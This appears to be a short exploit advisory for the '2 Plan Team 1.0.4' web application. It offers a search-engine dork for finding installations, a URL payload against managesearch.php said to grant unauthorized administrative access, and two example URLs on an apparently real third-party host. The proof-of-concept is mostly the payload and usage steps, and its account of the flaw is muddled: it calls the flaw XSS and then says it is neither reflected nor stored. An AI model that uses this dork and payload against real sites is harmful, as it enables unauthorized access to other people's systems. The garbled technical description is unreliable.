====================================================================================================================================
| # Title : 2 Plan Team 1.0.4 - From XSS to Unauthorized administrative access Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) |
| # Vendor : http://2-plan.com/ |
| # Dork : "Login @ 2-plan" |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Use payload : /admin.php/managesearch.php?query=hacked&action=search
[+] it show xss error and search box ( not a reflected xss or stored ) .
[+] in search box type any thing & press enter
[+] now in browser remove (admin.php/) from the 1st payload ==> /admin.php/managesearch.php?query=hacked&action=search & press enter
[+] http://downrange.biz.ht//admin.php/managesearch.php?query=hacked&action=search
[+] http://downrange.biz.ht/managesearch.php?query=hacked&action=search
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================